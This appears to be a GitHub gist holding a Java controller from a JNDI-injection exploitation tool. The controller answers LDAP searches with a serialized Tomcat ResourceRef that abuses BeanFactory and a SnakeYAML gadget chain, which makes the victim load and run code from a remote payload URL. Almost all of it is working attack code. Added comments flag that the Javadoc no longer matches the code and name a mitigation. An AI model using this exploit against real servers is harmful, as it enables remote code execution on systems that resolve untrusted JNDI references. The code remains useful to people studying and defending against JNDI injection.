@TheGrandPew
Created April 7, 2021 14:09
package artsploit.controllers;
import artsploit.Config;
import artsploit.annotations.LdapMapping;
import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
import com.unboundid.ldap.sdk.Entry;
import com.unboundid.ldap.sdk.LDAPResult;
import com.unboundid.ldap.sdk.ResultCode;
import org.apache.naming.ResourceRef;
import javax.naming.StringRefAddr;
import static artsploit.Utilities.makeJavaScriptString;
import static artsploit.Utilities.serialize;
/**
* Yields:
* RCE via arbitrary bean creation in {@link org.apache.naming.factory.BeanFactory}
* When the bean is created on the server side, we can control its class name and setter methods,
* so we can leverage {@link javax.el.ELProcessor#eval} method to execute arbitrary Java code via EL evaluation
*
* @see https://www.veracode.com/blog/research/exploiting-jndi-injections-java for details
*
* Requires:
* - tomcat-embed-core.jar
* - tomcat-embed-el.jar
*
* @author artsploit
*/
@LdapMapping(uri = { "/o=bypass" })
public class Bypass implements LdapController {
/** URL embedded in the generated reference; read from {@link Config#command} when the controller is instantiated. */
String payloadURL = Config.command;
/**
 * Answers an LDAP search on {@code base} with one entry whose {@code javaSerializedData}
 * attribute is a serialized Tomcat {@link ResourceRef}. The reference names
 * {@code org.yaml.snakeyaml.Yaml} as the object class and
 * {@code org.apache.naming.factory.BeanFactory} as the factory, and carries a
 * {@code forceString} address ({@code x=load}) plus an {@code x} address holding a YAML
 * document that embeds {@link #payloadURL}.
 * <p>
 * NOTE(review): the class-level Javadoc describes EL evaluation via ELProcessor#eval, but
 * the code below names SnakeYAML's {@code Yaml} class and a {@code load} setter; the class
 * doc and its "Requires" list look out of sync with the code — confirm which is current.
 * <p>
 * Defensive note: this response only has an effect on a JNDI client that resolves
 * {@code javaSerializedData} references returned by an untrusted LDAP server and whose
 * classpath contains the named Tomcat and SnakeYAML classes. Treating JNDI provider URLs as
 * untrusted input and refusing remote reference/factory resolution is the mitigation; on the
 * wire, an LDAP search result entry carrying {@code javaSerializedData} is the observable.
 *
 * @param result the intercepted search whose returned entry and result code are set here
 * @param base   the DN the returned entry is built for
 * @throws Exception anything thrown by {@code serialize(ref)} or the UnboundID send/set calls
 *                   propagates unchanged (presumably part of the {@code LdapController} contract, not visible here)
 */
public void sendResult(InMemoryInterceptedSearchResult result, String base) throws Exception {
System.out.println("Sending LDAP ResourceRef result for " + base + " with Bypass payload");
Entry e = new Entry(base);
e.addAttribute("javaClassName", "java.lang.String"); //could be any
//prepare payload that exploits unsafe reflection in org.apache.naming.factory.BeanFactory
// First argument is the object class, sixth the factory class; the null/empty arguments are
// presumably ResourceRef's description/scope/auth and factory-location slots — verify against the Tomcat signature.
ResourceRef ref = new ResourceRef("org.yaml.snakeyaml.Yaml", null, "", "",
true, "org.apache.naming.factory.BeanFactory", null);
// Pairs address name "x" with method name "load" (BeanFactory's setter-forcing convention, per the class Javadoc)
ref.add(new StringRefAddr("forceString", "x=load"));
// Value handed to that method: a YAML document whose tags name ScriptEngineManager, URLClassLoader and URL, with payloadURL embedded
ref.add(new StringRefAddr("x", "!!javax.script.ScriptEngineManager [\n !!java.net.URLClassLoader [[\n !!java.net.URL [\""+payloadURL+"\"]\n ]]\n]"));
//END OF REF
// The whole reference travels as a single serialized attribute value
e.addAttribute("javaSerializedData", serialize(ref));
result.sendSearchEntry(e);
// First argument is the LDAP message ID; presumably 0 is accepted by the in-memory interceptor — confirm
result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
}
}